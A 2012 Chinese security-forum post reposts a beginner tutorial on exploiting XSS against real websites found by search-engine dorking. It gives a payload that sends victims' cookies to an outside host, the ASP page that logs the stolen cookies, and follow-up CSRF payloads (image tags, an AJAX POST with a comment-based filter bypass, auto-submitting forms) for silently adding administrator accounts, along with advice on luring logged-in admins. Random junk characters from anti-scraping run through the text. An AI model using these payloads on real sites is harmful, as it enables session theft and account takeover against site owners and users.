找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2082|回复: 0
打印 上一主题 下一主题

实战xss漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:08:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前天贴吧一位朋友发了个后台XSS利用的帖子,大家就一起讨论了讨论,原帖为: $ t1 g: h- P" ]7 t) C! f+ [

, n' Z+ D$ m1 ohttp://tieba.baidu.com/f?kz=1069007239( g: ~4 P) @( X" g: A

! r: k+ v" D8 f: D这个帖子说的只是一个思路,不是很详细,并且说的是利用后台XSS挂马的情况,但是其实在后台挂马一般是不会牵扯到XSS的,只是一个过滤不过滤转换不转换的问题,比如很多带编辑器的后台,都是不过滤不转换在文章中的html代码的,比如eweb,你可以直接编辑发表文章的时候的html代码,这就为挂马、盗cookie提供了很多机会。
+ h# J5 q. A9 k0 \8 ~3 Y2 h+ z- {( `+ f! B% r! N3 f% i
但是,我想说的是,即使是挂马、盗cookie,也是不会使用location这种手法的,因为这样太明显了,一般都是使用普通挂马的手法的,比如iframe、JS等等。
6 m5 ]0 i2 H7 j$ }" n4 G5 h. V( L3 p5 J' c
我在上边的帖子中说作者讲的不是很详细,希望出一个详细点的利用教程,于是今天又一位朋友就发了一个详细些的文章,我这里就发大博客里,让更多需要的朋友看到这篇文章。# c8 w! b* J8 }: ]5 F

7 g; K- f5 _/ \/ f( A% q" R6 s% N这个文章是对XSS的一个很简单的利用,原理很简单,主要用于科普,只是想让朋友们知道,XSS并不是简单的弹个框框玩那么简单的,是有很多利用价值的,在国外,XSS已经被列为网站杀手之一,包括国内的很多大站,大家都把心思放到了防范SQL注入上,相应的对XSS的防范就很少,这也是XSS总是能成功的原因之一。
1 F# {! c* b7 e; r
* d; r7 X" @$ n- F好了,废话不多说了,一起来看文章吧。
" @+ h  g7 K$ D6 S# }1 Y7 K( l4 z5 t
-------------------------------------------------------------------" W" ~, H5 k8 [; K4 g  v7 W

4 C/ b0 W; J) O4 Z( V& r首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先<script>alert('xxs')</script>一下。呵呵,框框出来了。( H6 H$ Z& M8 Q2 C% k1 g+ ^: C9 s

( z4 P6 M: G+ x3 ?9 }! t" u ' I9 D7 O/ n& c1 Q  X) q
( J7 P5 [/ {2 O$ ~7 |
再看看自己的Cookie吧,把alert里面的内容换成document.cookie就可以了,如图:
5 O' z/ f/ W" }) t( H6 X# w8 i1 V% H& A, w9 `' M' x4 x3 h8 Z$ X
* C2 D* g7 L# _% L
  [' g# S+ ]( P/ w& \
这里就是要把弹出来框框里的东西收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是
: E5 S7 O$ S, D1:让目标访问已跨站的网址,然后这个网址执行脚本2 E; `- B6 M; v0 j, u! _( p: q
2:然后跳转到你已经写好专门用来收集Cookie的网址4 J  V+ m3 ?: o. K

0 S; b  P7 G/ B0 B9 [7 f- m具体实现方法:
0 a- |# a, c& c( ?0 |4 q先构造语句<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>5 l1 t- l3 T6 D8 m5 M5 W
这句话意思是打开一个新的窗口,访问http://dlgyi.rrvv.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。* d# o; m, f; _& n- A7 k1 ?
# |8 X) k& K; j2 }/ o, t8 U+ M# |
这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:
0 `5 K& y9 S: j/ k; R
# |/ B% q6 n( e8 t& w$ S<html>, O6 D  L! }" e, i8 u
<title>xx</title>$ a1 U' ]- @! h: F
<body>
& \1 |( D: v5 H  \<%& i) V4 Y( b2 r9 D$ K% K
testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中: f# R! L8 t  G7 o' E
msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值1 ~. M1 q# v9 D
set fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象! t1 ^4 C, `; \6 W: K3 w
set thisfile = fs.OpenTextFile(testfile,8,True,0)
; |  g, x* a, B) ]& m8 u' K5 y- Uthisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie  O) Z7 |# m/ Q
thisfile.close   //关闭
( S. g2 i2 z9 R8 jset fs = nothing0 j8 a' U) @3 ]; o7 i( g; B
%>
3 C4 x0 U* \3 D, b3 e</body>7 W/ N4 r* v7 j6 W& U2 T  ~
</html>; F  C! \% _4 S0 O8 D
6 r8 v6 M' N# }0 b6 k
然后保存,放在你自己服务器上,如果有人点击构造好的XXS页面,就会自动在你网站的根目录生成一个文本:4 J$ j& K* L: K* R
  p( |% r8 b6 o5 u3 b2 r

& R0 E) e$ F- @7 N9 g
' M- X/ i7 P; q5 M5 L# S' C: m* o3 a
拿出来看看,呵呵,Cookie到手:1 R) s! G) z! w) e# I6 p/ |- C

3 S  z, K* Z7 R4 E/ P# G8 b  W - y0 w. i- G3 K- D* I' j

: _" j- w' b$ V6 L2 S本文只是抛砖引玉,而且没有多大的实战价值,一来很多网站都过滤掉了+号这个字符连接符,二来稍大点的站,也不会存在如此的XXS,本文旨在给新手一个练习的向导,毕竟不可能谁一开始学习就可以RI掉大站,从小站开始练手,一起进步。话说咱也是新手O(∩_∩)O~8 K( L) F8 T9 Y4 ]1 ^
' |0 q# x6 ~# X  C
PS:一点小提示,如果提交<script>alert('xxs')</script>网站没有反应时,不要立刻就点X。你可以鼠标右击,查看一下网站的源码,看看网站到底过滤掉了什么字符,通过编码啊神马的发挥下智慧,绕过过滤。只要出现小框框,咱就胜利了。
* s7 O! x# D+ i: w; D% r9 R3 C. W
-------------------------------------------------------------------; c3 o4 P7 O; V/ O
) M( b, H  K3 o" c( b" I( u
下面是我对这个帖子的回复,也一起贴过来吧:  h" `! I: M: s7 b: L! T6 k9 Y; k: n7 F
7 g; {; C& G3 y  S2 n! m  K7 b' Y$ k
说实话,像这种后台XSS其实作用不大的,一般的小站你拿到cookie也没什么利用价值,大点的站的话,或许可以用cookie盗点装备什么的,但那牵扯的多了,不过对于普通脚本小子来说,日站的时候除非毫无办法了还会想到XSS的,不过日站时候的XSS利用方法跟这篇文章里讲的差不多的,可以借鉴一下。; {/ o0 y3 V* T% y% H, u

( j3 k# K6 Z; J/ L7 I' ]' N但是,这里的文章讲的是针对已经进入后台、拿shell无望又想多获得点东西的情况,说它鸡肋的原因是,你知道的,现在大部分站都是cookie+session的,并且一般用户名和密码不会直接放到cookie里了,这是它鸡肋的原因。7 ]) }6 d6 l' @* U# \
再者,日站的时候盗cookie一般是想进后台,但是如果遇到网上有源码的情况的话,还可以进一步利用,比如添加个管理员什么的。- Q  i' d; |' B3 g; M# d: x4 o
! K2 a) ?: x+ A, V* P
在文章的最后,顺便贴上一般XSS的利用思路,也不是原创,原文链接:* O' l1 i4 B7 e" c
- @* F4 w; u4 c) M. d, x
http://user.qzone.qq.com/673116767/blog/1252452536  B6 r% u7 m/ l) F9 u+ c- [

2 W/ Y! ~" \/ N9 a一般发现一个xss漏洞后要做的基本上就是这些:! n* d) O1 G- K
  n: k2 `9 M* a. ?( E1 s4 l% o
1.  伪造请求  使用$_REQUEST或$_GET) m2 H9 }, _7 I7 ^3 s7 b

/ c6 a' F5 u/ o- e首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:) c# x1 E& e, N: H
<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />
" l/ ?# Y6 W- Q9 I1 p3 @/ O当管理员登录管理后台后看到包含img的页面的时候,就伪造了一个增加后台管理员的请求,而该请求是由管理员发出的,所以顺利的增加了一个新的管理员。
7 a* A; \) N# L+ q3 x% K- e; T) ~1 n- ]+ L! S, H7 D
如果是可视文本编辑器,可以尝试使用输入:8 ~! c2 E+ _, K0 c! i
http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')
% M0 n- W" l: t6 X# n/ T! O6 ~这样最终会构造出:
* M8 D2 l/ z5 W; M% [7 k+ k<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />0 V; l9 J. g- ]7 m# c
总之要举一反三。
1 X+ Z2 S5 c0 D5 T4 u0 u7 ^, u$ Y6 s; T4 v9 @4 t1 k8 `9 Z
2. 伪造请求  使用$_POST4 i- V: R+ W9 }- r- h7 K. A2 z
6 i5 ^7 u# D* I& n! z  q, r
当后台接收增加管理员或更改管理密码的变量时使用的是$_POST方式,那么第一种方法无效,我们视情况而定,如果没有过滤<script>,我们可以通过ajax方式来伪造请求,如:
9 R6 {7 \8 \' m" @6 ~<sc/*xss*/ript type="text/javascript">
2 x8 y& z3 C) zvar aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");
$ z! E- T1 k$ X# r$ R( u2 Kaj.open("POST", "/admin/admin_add.asp", false);2 O# D0 o& ?8 Y1 ?: U: o% x4 O
var postdata = 'name=xxx&psd=yyy';6 Z) u+ k  x! X
aj.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); . d' F1 g% B  J0 G
aj.send(postdata);6 t8 D# u- x6 G
</scr/*xss*/ipt>
% O% X. I! d. ?/*xss*/是HTML注释,用来绕过简单的对script代码块的过滤。2 H3 L4 s- S9 l$ n9 `

7 E6 `5 i2 M8 B! N) Z* w  x8 J! Z3. 跨站伪造请求 使用$_GET 或 $_REQUEST. A/ c0 M+ @8 @( X; i* O

5 h4 ?6 A& v: e$ m# T6 g/ k2 C' k与第一种伪造请求的方式相似,但是第一种伪造请求是利用站内的xss漏洞进行的,而跨站伪造请求,是站外发起的,比如我在我的博客的首页放了这样一个图片% B4 p0 R: Y% r# K* S+ }
<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>) q" ?9 t7 W$ I
然后我跑到dvbbs上发帖子,“勾引”动网论坛的管理员来我的博客,如果动网论坛的管理员已经登录了他的管理后台,然后使用共享进程的浏览器(目前基于ie内核的myie,maxton等等还有firefox都是共享进程的)来访问我的博客,那么他的后台就会被加入一个用户。
& l4 ^3 F( r4 f* P! |! b( |$ m9 ]1 j: v% X' N  s; E8 I
4.跨站伪造请求 使用$_POST(0day)
, I  _: [' k3 K# I  L$ X, B) j( s$ R) Q/ H0 G
如果入侵目标的管理后台使用的是$_POST方式来接受变量,那么我们无法在我们的网站跨站使用ajax的post方式提交数据过去,因为ajax是无法跨域的。
+ O# s/ O$ u) \' |' \, X2 ~! a, D8 W, W+ P8 I
但是我们可以在我们的网站放一个form,里面填写好数据,form的action为要利用的有漏洞的页面,然后当有人打开该页面的时候,我们就用js控制该form进行submit,ajax虽然不能跨域,但向域之外的地址提交form总是可以的。; q; y+ |$ I( T* O' ~
* j. [, Z7 w- g: o: A: A, T7 Y
总之,第3,4种方法成功几率要小一些,因为我们要想办法让已经登录自身后台的管理员,使用共享session的浏览器访问我们的伪造请求的页面,有一点社会工程学的技术含量。- r/ @- e5 v/ n1 ?
  T& n3 a# g  t8 f! {4 H
OK,该说的都说完了,Over。0 W# D2 S+ E1 X9 R  R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表